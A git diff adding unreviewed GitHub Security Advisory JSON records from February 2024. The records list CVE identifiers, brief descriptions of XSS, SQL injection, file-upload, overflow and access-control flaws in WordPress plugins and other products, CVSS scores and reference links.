+ "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0382"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json b/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json
new file mode 100644
index 0000000000000..7bbb0841186fa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rqqw-5q6g-cjxv",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2024-0255"
+ ],
+ "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0255"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json b/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json
new file mode 100644
index 0000000000000..c742691140b00
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rrv7-vmq5-x86q",
+ "modified": "2024-02-07T00:30:26Z",
+ "published": "2024-02-07T00:30:26Z",
+ "aliases": [
+ "CVE-2024-1264"
+ ],
+ "details": "A vulnerability has been found in Juanpao JPShop up to 1.5.02 and classified as critical. Affected by this vulnerability is the function actionUpdate of the file /api/controllers/common/UploadsController.php. The manipulation of the argument imgage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253003.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1264"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/f8b2IX7GsZS5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253003"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253003"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json b/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json
new file mode 100644
index 0000000000000..f054b2e180700
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv54-p5vw-c6p6", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2024-0324" + ], + "details": "The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0324" + }, + { + "type": "WEB", + "url": "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022354/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json b/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json new file mode 100644 index 0000000000000..99666ee1afdd2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvgx-76xx-c287", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24130" + ], + "details": "Mail2World v12 Business Control Center was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Usr parameter at resellercenter/login.asp.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24130" + }, + { + "type": "WEB", + "url": "https://github.com/Hebing123/cve/issues/13" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json b/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json new file mode 100644 index 0000000000000..6c229a9967609 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw8w-74p5-cf2h", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2024-22430" + ], + "details": "\nDell PowerScale OneFS versions 8.2.x through 9.6.0.x contains an incorrect default permissions vulnerability. A local low privileges malicious user could potentially exploit this vulnerability, leading to denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22430" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json new file mode 100644 index 0000000000000..06c4ff10e180e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwrp-rr8g-cg9q", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1257" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1257" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252996" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252996" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json b/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json new file mode 100644 index 0000000000000..fc5ab0e410f19 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwv8-w229-vr4v", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0370" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0370" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json b/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json new file mode 100644 index 0000000000000..9417458002f2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3f3-6g4p-2h35", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-23756" + ], + "details": "The HTTP PUT and DELETE methods are enabled in the Plone official Docker version 5.2.13 (5221), allowing unauthenticated attackers to execute dangerous actions such as uploading files to the server or deleting them.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23756" + }, + { + "type": "WEB", + "url": "https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23756" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json b/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json new file mode 100644 index 0000000000000..97ea864ba84b4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3x4-p7hr-w52x", + "modified": "2024-02-06T03:32:58Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51684" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Digital Downloads Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) allows Stored XSS.This issue affects Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy): from n/a through 3.2.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51684" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json b/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json new file mode 100644 index 0000000000000..015397e1fbbd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json 
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v42h-5rm7-cppg", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6231" + ], + "details": "Buffer overflow in WSD probe request process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6231" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json b/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json new file mode 100644 index 0000000000000..d872907a5beca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4cg-mf2j-mwp7", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2023-37527" + ], + "details": "A reflected cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attacker to execute malicious javascript code in the application session or in database, via remote injection, while rendering content in a web page. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37527" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json b/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json new file mode 100644 index 0000000000000..0fa27a0ed6346 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4r9-2j27-fxxf", + "modified": "2024-02-05T06:30:30Z", + "published": "2024-02-05T06:30:30Z", + "aliases": [ + "CVE-2024-20001" + ], + "details": "In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961601; Issue ID: DTV03961601.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20001" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json b/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json new file mode 100644 index 0000000000000..81c888f424d08 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v53j-mp5w-59f7", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-51951" + ], + "details": "SQL Injection vulnerability in Stock Management System 1.0 allows a remote attacker to execute arbitrary code via the id parameter in the manage_bo.php file.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51951" + }, + { + "type": "WEB", + "url": "https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2023-004" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json b/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json new file mode 100644 index 0000000000000..c27910263511c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5vm-g52c-4v89", + "modified": "2024-02-01T12:30:21Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52192" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Keap Keap Official Opt-in Forms allows Stored XSS.This issue affects Keap Official Opt-in Forms: from n/a through 1.0.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52192" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/infusionsoft-official-opt-in-forms/wordpress-keap-official-opt-in-forms-plugin-1-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json b/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json new file mode 100644 index 0000000000000..845589e0da585 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v62h-prj4-9v6m", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52191" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52191" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/infogram/wordpress-infogram-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json b/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json new file mode 100644 index 0000000000000..3c0b17a44c61a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v63h-fjp2-v8q9", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2023-35188" + ], + "details": "\nSQL Injection Remote Code Execution Vulnerability was found using a create statement in the SolarWinds Platform. This vulnerability requires user authentication to be exploited.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35188" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2024-1_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-35188" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json b/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json new file mode 100644 index 0000000000000..d8d42e0d54f73 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v78v-jm8m-vmmw", + "modified": "2024-02-05T09:30:29Z", + "published": "2024-02-05T09:30:29Z", + "aliases": [ + "CVE-2021-4436" + ], + "details": "The 3DPrint Lite WordPress plugin before 1.9.1.5 does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4436" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T09:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json b/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json new file mode 100644 index 0000000000000..18672642bb1fe --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v82p-3pq8-jrvq", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-52118" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP User Profile Avatar allows Stored XSS.This issue affects WP User Profile Avatar: from n/a through 1.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52118" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-user-profile-avatar/wordpress-wp-user-profile-avatar-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git 